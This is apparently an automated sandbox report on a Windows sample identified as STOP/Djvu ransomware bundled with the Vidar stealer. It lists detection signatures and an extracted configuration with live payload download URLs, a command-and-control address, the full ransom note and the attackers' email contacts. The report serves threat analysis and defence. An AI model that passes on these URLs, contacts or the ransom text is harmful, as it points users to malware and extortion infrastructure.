Windows Analysis Report
R5391762lf.exe

Overview

General Information

Sample name: R5391762lf.exe (renamed because the original name is a hash value)
Original sample name: 4f8fb134c680d0e05861a34827751834.exe
Analysis ID: 1431221
MD5: 4f8fb134c680d0e05861a34827751834
SHA1: 5a20d1ff30218dea67d3ff7f61e16e5cc958006f
SHA256: 9c9ed624eaf441b4637d50fe25d386636c5cb59fb69f5b824afc7cec6dfff7f0
Tags: exeStop

Detection

Clipboard Hijacker, Djvu, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected Djvu Ransomware
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: STOP, Djvu
Description: STOP Djvu Ransomware is ransomware that encrypts user data with AES-256 and adds one of the dozen available extensions as a marker to the encrypted file's name. It does not encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, used a hard-coded key which could be extracted to decrypt files.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: R5391762lf.exe Avira: detected
Source: http://cajgtus.com/files/1/build3.exe Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0863PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", 
"C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Joe Sandbox ML: detected
Source: R5391762lf.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 2_2_0040E870
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 2_2_0040EA51
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 2_2_0040EAA0
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 2_2_0040EC68
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 2_2_00410FC0
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext, 2_2_00411178
Source: R5391762lf.exe, 00000007.00000003.2078287754.00000000030F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_2e10f168-1

Compliance

Source: C:\Users\user\Desktop\R5391762lf.exe Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Unpacked PE file: 11.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack
Source: R5391762lf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\_README.txt
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\$WinREAgent\_README.txt
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\$WinREAgent\Scratch\_README.txt
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File created: C:\Users\user\_README.txt
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\41\\5bU)% source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ m[%K source: R5391762lf.exe, 00000007.00000003.2081897313.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098573555.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100791102.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080641815.0000000003787000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Hq source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\kL source: R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-IQ\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ABA671~1A8E3aba6710fde0876af_0ata\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\NV, source: R5391762lf.exe, 00000007.00000003.2068868095.0000000003538000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.000000000351F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049588960.0000000003505000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049773121.0000000003517000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\8\) source: R5391762lf.exe, 00000007.00000003.2068625676.0000000003494000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067819538.0000000003491000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2136303536.0000000003B65000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+D> source: R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2101597700.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ache\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068555631.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\W source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: R5391762lf.exe, 00000007.00000003.1948567038.0000000003699000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049541715.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\d.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ngs\ source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
